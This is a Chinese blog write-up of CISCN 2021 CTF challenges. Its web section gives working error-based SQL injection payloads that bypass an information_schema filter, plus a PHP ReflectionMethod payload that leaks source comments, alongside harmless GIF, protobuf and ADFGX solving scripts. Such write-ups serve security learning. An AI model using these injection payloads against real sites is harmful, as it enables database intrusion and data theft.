CISCN2021赛后复现

最新推荐文章于 2024-05-20 22:22:59 发布
最新推荐文章于 2024-05-20 22:22:59 发布
阅读量1.9k 收藏 5
点赞数 3
分类专栏: WriteUp CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46150940/article/details/116890417
版权
CTF 同时被 2 个专栏收录
39 篇文章 12 订阅
订阅专栏
WriteUp
15 篇文章 2 订阅
订阅专栏

Web

esay_sql

输入单引号报错

uname=admin&passwd=123456'&Submit=%E7%99%BB%E5%BD%95

#You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''123456'') LIMIT 0,1' at line 1

image-20210515182436750
sqlmap跑了一下,可以使用报错注入

1.爆库名

uname=admin&passwd=123456')and extractvalue(1,concat(0x7e,database(),0x7e))--+&Submit=%E7%99%BB%E5%BD%95

#XPATH syntax error: '~security~'

2.爆表名

猜测表名为flag

uname=admin&passwd=123456')and extractvalue(1,concat(0x7e,(select * from flag),0x7e))--+&Submit=%E7%99%BB%E5%BD%95

#Operand should contain 1 column(s)

3.爆列名

过滤了information_schema函数,可以使用join 无列名注入

得到id列

uname=admin&passwd=123456')and extractvalue(1,concat(0x7e,(select * from (select * from flag a join flag )b),0x7e))--+&Submit=%E7%99%BB%E5%BD%95

#Duplicate column name 'id'

得到no列

uname=admin&passwd=123456')and extractvalue(1,concat(0x7e,(select * from (select * from flag join flag as a using(id))b),0x7e))--+&Submit=%E7%99%BB%E5%BD%95

#Duplicate column name 'no'

得到ea1235fa-d397-474b-8188-dedbe352ffc7列

uname=admin&passwd=123456')and extractvalue(1,concat(0x7e,(select * from (select * from flag join flag as a using(id,no))b),0x7e))--+&Submit=%E7%99%BB%E5%BD%95

#Duplicate column name 'ea1235fa-d397-474b-8188-dedbe352ffc7'

4.爆值

uname=admin&passwd=123456')and extractvalue(1,concat(0x7e,(select `ea1235fa-d397-474b-8188-dedbe352ffc7` from flag),0x7e))--+&Submit=%E7%99%BB%E5%BD%95

#XPATH syntax error: '~CISCN{tJ1mc-jgoXW-qiG07-oHt4u-s

因为报错注入限制只能读取一半flag,用right读取右半部分

uname=admin&passwd=123456')and extractvalue(1,concat(0x7e,right((select `ea1235fa-d397-474b-8188-dedbe352ffc7` from flag),20),0x7e))--+&Submit=%E7%99%BB%E5%BD%95

#XPATH syntax error: '~-qiG07-oHt4u-shqSb-}~'

image-20210515184620854
消去重复部分,最终flag为

CISCN{tJ1mc-jgoXW-qiG07-oHt4u-shqSb-}

easy_source

一道原题,参考wp复现的
题目描述:你知道开发一个php程序很重要的东西是什么吗(flag在你看不到的地方)

最重要的就是备份,访问.index.php.swo得到源码:

本题目没有其他代码了噢,就只有这一个文件,虽然你看到的不完全,但是你觉得我会把flag藏在哪里呢,仔细想想文件里面还有什么?
<?php
class User
{
    private static $c = 0;

    function a()
    {
        return ++self::$c;
    }

    function b()
    {
        return ++self::$c;
    }

    function c()
    {
        return ++self::$c;
    }

    function d()
    {
        return ++self::$c;
    }

    function e()
    {
        return ++self::$c;
    }

    function f()
    {
        return ++self::$c;
    }

    function g()
    {
        return ++self::$c;
    }

    function h()
    {
        return ++self::$c;
    }

    function i()
    {
        return ++self::$c;
    }

    function j()
    {
        return ++self::$c;
    }

    function k()
    {
        return ++self::$c;
    }

    function l()
    {
        return ++self::$c;
    }

    function m()
    {
        return ++self::$c;
    }

    function n()
    {
        return ++self::$c;
    }

    function o()
    {
        return ++self::$c;
    }

    function p()
    {
        return ++self::$c;
    }

    function q()
    {
        return ++self::$c;
    }

    function r()
    {
        return ++self::$c;
    }

    function s()
    {
        return ++self::$c;
    }

    function t()
    {
        return ++self::$c;
    }
    
}

$rc=$_GET["rc"];
$rb=$_GET["rb"];
$ra=$_GET["ra"];
$rd=$_GET["rd"];
$method= new $rc($ra, $rb);
var_dump($method->$rd());

根据提示,本题就这一个文件,而且提示看到的不完全,猜测 flag被注释了,而且在类中被注释了。

需要GET提交四个参数,可以实例化任意类,并调用类方法。利用 PHP内置类中的 ReflectionMethod 来读取 User 类里面各个函数的注释

本地测试:

<?php
class User
{
	private static $c = 0;
	//pubLic $b = 100;
	function a()
	{
		return ++self::$c;
	}
	/**
	 * Increment counter
	 *
	 * @final
	 * @static
	 * @access  publicCISCN{test}
	 * @return  int
	 */
	function b()
	{
		return ++self::$c;
	}
}
$d = new ReflectionMethod('User', 'b');
var_dump($d->getDocComment());

运行结果如下:
在这里插入图片描述
源码中有26个函数,flag在某个函数的注释中,构造Payload

?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment

抓包,爆破rb参数的值,从a-z开始爆破,最终在q的注释中找到flag
在这里插入图片描述

MISC

running_pixel

使用脚本进行gif分帧

# -*- coding: utf-8 -*-
import os
from PIL import Image
file_name = 'running_pixel.gif'
# 使用Image模块的open()方法打开gif动态图像时,默认是第一帧
im = Image.open(file_name)
# 定义存储图片的文件名与读取的GIF图片名一致
file_save = file_name[:-4]
# 在同级目录下创建存放每帧图片的文件夹
# 创建一级目录:os.mkdir('D:\\gif1')   创建多级目录:os.makedirs('D:\\gif1\\gif1')
os.mkdir(file_save)
try:
  while True:
    # 保存当前帧图片
    # 获取当前文件的位置(GIF图的帧数)
    frame_number= im.tell()
    # 保存图片,格式为png
    im.save(file_save+'/'+str(frame_number)+'.png')
    # 获取下一帧图片
    im.seek(frame_number+1)
except EOFError:
    pass
print("共:", frame_number, "张图片")

参考末初师傅的wp

PS打开打开几张图片查看,有可疑白点,像素块为RGB: (233,233,233),其他图片中也发现了这个像素块
在这里插入图片描述
提取382张图片的像素块

# -*- coding: utf-8 -*-
from PIL import Image

flag_img = Image.new('1',(400,400))
#mode=1 1位黑白像素,每字节存储一个像素
for name in range(0,381):
    framepic = Image.open(f"./running_pixel/{name}.png")
    framepic = framepic.convert("RGB")
    width,height = framepic.size
    for w in range(width):
        for h in range(height):
            if framepic.getpixel((w,h)) == (233,233,233):
                flag_img.putpixel((h,w),1)

    flag_img.save(f"flag_{name}.png")

最后一张图
在这里插入图片描述
根据字符出现顺序得到:12504D0F-9DE1-4B00-87A5-A5FDD0986A00
最终flag为

CISCN{12504d0f-9de1-4b00-87a5-a5fdd0986a00}

tiny traffic

流量包拖入wirkshark中,导出http对象,发现了两个gzip和两个br文件
在这里插入图片描述
解压flag_wrapper得到…
在这里插入图片描述
把test后缀改为br,解压得到test:

syntax = "proto3";

message PBResponse {
  int32 code = 1;
  int64 flag_part_convert_to_hex_plz = 2;
  message data {
    string junk_data = 2;
    string flag_part = 1;
  }
  repeated data dataList = 3;
  int32 flag_part_plz_convert_to_hex = 4;
  string flag_last_part = 5;
}

message PBRequest {
  string cate_id = 1;
  int32 page = 2;
  int32 pageSize = 3;
}

下载解压后进入到bin目录,将之前解压出来的test改为test.proto并移动到bin目录

.\protoc.exe --python_out=. test.proto

得到test_pb2.py,把解压后的secret也移动到bin目录
在这里插入图片描述
反序列化

import test_pb2

with open('./secret','rb') as f:
    data = f.read()
    target = test_pb2.PBResponse()
    target.ParseFromString(data)
    print(target)

运行脚本得到

code: 200
flag_part_convert_to_hex_plz: 15100450
dataList {
  flag_part: "e2345"
  junk_data: "7af2c"
}
dataList {
  flag_part: "7889b0"
  junk_data: "82bc0"
}
flag_part_plz_convert_to_hex: 16453958
flag_last_part: "d172a38dc"

把15100450和16453958转换为hex,和其他hex按顺序拼接得到最终flag

CISCN{e66a22e23457889b0fb1146d172a38dc}

CRYPTO

classic

附件内容

AXAXDFDXXAFADFGFXAADFGDXGFDXFFDFAXDXFFFFXGXGAAXAGAFDDXFFDXFFDXDXDXDXGFDFAXFXAADXAAGAXGDGXAXAFAXXFFXADFFGAADXDXAXDFDFDXXAXXDXDAAAAAFAXAAAFGGAFGFGXADXXADFGADXDFDFGAGFDGAXFGAXDGDADXFFFFDAGFADXGDX

ADFGX密码,用最经典的密码表phqgmeaynofdxkrcvszwbutil,key为题目名字classic,最可气的是解密时需要将附件中的内容反转得到密文:

str="AXAXDFDXXAFADFGFXAADFGDXGFDXFFDFAXDXFFFFXGXGAAXAGAFDDXFFDXFFDXDXDXDXGFDFAXFXAADXAAGAXGDGXAXAFAXXFFXADFFGAADXDXAXDFDFDXXAXXDXDAAAAAFAXAAAFGGAFGFGXADXXADFGADXDFDFGAGFDGAXFGAXDGDADXFFFFDAGFADXGDX"
print(str[::-1])

#XDGXDAFGADFFFFXDADGDXAGFXAGDFGAGFDFDXDAGFDAXXDAXGFGFAGGFAAAXAFAAAAADXDXXAXXDFDFDXAXDXDAAGFFDAXFFXXAFAXAXGDGXAGAAXDAAXFXAFDFGXDXDXDXDFFXDFFXDDFAGAXAAGXGXFFFFXDXAFDFFXDFGXDGFDAAXFGFDAFAXXDFDXAXA

然后再解密得到flag,大意了
在这里插入图片描述

Atkxor
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 15
    评论
专栏目录
CISCN 2021 题目复现
树木常青的博客
05-21 1517
前言 ciscn大概是自己学习网安以来参加的第一个比较正式的比赛吧,发现自己比想象的还菜,一个没做出来。。。还好赛后可以照着大佬们的wp复现,记录一下自己复现过程中的一些问题和收获(想复现的话建议直接跳转到文章结尾看羽师傅的文章)。(这只是菜鸡的一些学习记录,欢迎指出错误,大佬请略过) upload(buu复现) 1,用这个绕过getimagesize函数,第一次知道。 #define width 1 #define height 1 2,unicode配结合mb_strtolower()函数绕过,但不知
2021-CISCN-初赛 总结
Chmaz的博客
05-21 1000
第一次打ctf比赛,之前也没怎么做过题,果然被虐惨了,全队一个题也没做出来. 选择 几乎都看不懂,目前大一,专业知识几乎还未涉猎,还好是开卷,拿了625分. 杂项 Running_pixel 题目给了一个gif图 比赛时候想了很久,唯一能着手的点就是发现,gif每10帧图片会变色,但是就此思路就断了,怎么处理也没有什么思路. 其实当时一度离正确思路非常近, 当时我在第十帧经过处理后发现一个奇妙的点点.但是当时并没有多想. 结果正确思路就是把每十帧的图片对比每位像素,合在一张图上得到这样的图片,按顺序.
CISCN初赛wp misc,re,pwn,web,crypto
fivesheeptree的博客
05-20 826
CISCN初赛wp misc,re,pwn,web,crypto
CISCN2022东北赛区复赛Writeup-MapleLeaves
Do1phln的博客
06-19 3104
Do1phln b477ery sfc9982 0HB密文中字母跨度在 G-K 间,不禁让人想往 A-F 平移,平移后即为且全部为可打印 ASCII 文本。 拖入本地离线 CyberChef 中先使用Base32,再使用Base85 IP method 解密得到 flag分析音频,无有效信息。加之题目体制侧重于文件方向,使用 010 Editor 打开音频文件,在尾部发现类似 Base64 的文本信息,经过两次解密后得到某个东西的密码。 初步考虑文件内含压缩包或者音频存在隐写信息。经多个工具尝试过后发现
2020CISCN Crypto lfsr
weixin_44795952的博客
10-12 427
时隔两个月,看了师傅的wp终于把这道题搞明白了 直接看加密源码: def lfsr(state, mask): feedback = state & mask feed_bit = bin(feedback)[2:].count("1") & 1 output_bit = state & 1 state = (state >> 1) | (feed_bit << (N-1)) return state, out
CISCN2018-Crypto】 crackme-java解析
ATFWUS的博客
06-09 1072
今天闲着无事,于是翻到了buu密码学的最后一页,看到了一道名字带java的题,还是很亲切的,于是花了一点时间做出来了,发现网上相关的wp较少,于是有了这篇wp,一步一步分析。 1.原题 题目为crackme-java,包含一个java源文件,没有其它提示。 import java.math.BigInteger; import java.util.Random; public class Test1 { static BigInteger two =new BigInteger("2").
下载思科模拟器Cisco packet Tracer 8.2.2
最新发布
05-28
Cisco packet Tracer 8.2.2用于思科实验,练习使用。非常方便。
思科cisco实验内容练习.zip
09-25
思科模拟器各种设备练习,包含1.交换机的基本配置2.连接有线和无线配置3.第 3 层交换机4.路由器基本配置及排除i 5.pv4和ipv6编址6.子网划分7.服务器8.无线路由器9.扩展练习-.端口安全
cisco模拟器 思科模拟器 v6.0
10-18
思科模拟器,思科模拟器又被称为cisco模拟器。他的英文全称是Cisco Packet Tracer。思科模拟器是由Cisco公司发布的一个辅助学习工具,为学习思科网络课程的初学者去设计、配置、排除网
思科仿真模拟器cisco packet tracer6.2
03-07
cisco packet tracer 6.2是由思科推出的一款仿真模拟器,主要用于思科各类设备的模拟学习操作,包括交换机、路由器的模拟,旨在帮助初学者进行各类网络的设计、配置、排除网络故障等,用户还可以在软件的图形用户...
【阿尼亚不会CTF】第十五届CISCN创新实践能力赛—线上初赛部分writeup
qq_45943172的博客
05-30 1095
目录 ez_usb 基于挑战码的双向认证、基于挑战码的双向认证2: 基于挑战码的双向认证3 ISO9798 ez_usb 题目描述: 简单的流量。 解题思路: 下载附件,解压得到一个流量包,如题,是USB流量分析。 观察发现主要有2.4.1、2.8.1、2.10.1三个Source的键盘输入,分别进行筛选并导出; 然后利用kali自带的tshark工具提取对应的内容; tshark -T json -r 241.pcapng > 241.json tshark -T.
2021 全国大学生信息安全竞赛ciscn web wp
midi
05-19 2024
2021 ciscn web wpupload 复现几道没做出来的题:> upload 发现文件index.php、example.php 知识点1:绕过getimagesize 在上传的文件最后面加上 #define width 1 #define height 1 知识点2:绕过zip字符中的i 结合 https://bugs.php.net/bug.php?id=77375 使用İ字符可以绕过i字符的匹配,如果php这三个字符也能绕过就能直接上传php了~~,官方中发现只能针对这几个字符
CISCN2021 西北赛区分区赛 Web xb_web_flask_trick
feng的博客
06-08 775
前言 6.5号去了兰州打了分区赛,4道Web出了web1和web4,web2和web3都不会。这题flask是web3,讲道理对我这种对flask不熟悉的弟弟来说还是挺难的,比赛的时候只有西电的一个队伍出了。今天晚上在学长的帮助下终于出了这道题,也是学到了很多的东西。 源码 import os from flask import Flask, request, abort, session app = Flask(__name__) app.config["SECRET_KEY"] = os.urand
2021-DASCTF八月挑战赛
Yasso的博客
09-01 1496
babypython[国赛总决赛复现] 是个上传界面,经测试只能上传zip文件 看到页面提示,猜测只有admin才能得到flag,需要伪造session,伪造session要用到一个工具-flask-unsign 所以这道题关键是需要找到key. 可以上传zip文件,同时后台自动解压的情况下,从而实现任意文件读取。 软连接导致任意文件读取 我们可以压缩一个软链接,类似于windows下的快捷方式,然后网站后台会解压读取该软链接指向的服务器上的文件,就能达到读取任意文件的效果。 ln -s /etc/pas
【Web】记录CISCN 2021 总决赛 ezj4va题目复现——AspectJWeaver
uuzeray的博客
03-22 1311
这就是当年传说中的零解题嘛😭,快做🤮了有了之前的经验,思路顺挺快的,中间不知道为啥一直一直一直一直报错,耗了一个下午总算打通考的是AspectJWeaver写恶意字节码到靶机上(本题jsp靶机不解析),再去对其进行反序列化值得一提的是,本题并未在输入流进行黑名单过滤,事实上就是纯粹的原生反序列化,但因该jdk下无利用链可打,所以只能先迂回写入一个恶意类,再对这个恶意类进行反序列化操作,实在是巧思!
2022CISCN初赛 WP
Lum1n0us's Blog
05-29 1214
文章目录Crypto签到电台 Crypto 签到电台 在公众号找到提示 在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。 发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。 “弼时安全到达了”所对应的7个电码: 1732 2514 1344 0356 0451 6671 0055 模十算法示例:1732与6378得到7000 发包示例:/sen
[CISCN2021]初赛
Huamang的博客
05-16 1985
easy_sql 无列名和报错注入 uname=123&passwd=123') AND EXTRACTVALUE(1,CONCAT(0x5e,(select * from (select * from flag as a join flag as b using(no,id))x)))--+ 出了字段名1d004bae-a9e9-4f4e-8af1-c9518d464307 uname=qwe&passwd=') AND EXTRACTVALUE(1,CONCAT(0x5e,(sele
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 2310
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTF的wp写一下,供大家参考。赛题不分上下午场了。
思科所有命令,思科所有命令
10-10
"CiscoIOSMasterCommandList,AllReleases" 是一份详细列出思科网络设备上可用的所有命令的文档,涵盖了多个章节,包括但不限于配置、安全、路由、接口管理、故障排查等方面。这份文档最早发布于2008年2月29日,并在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Atkxor

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值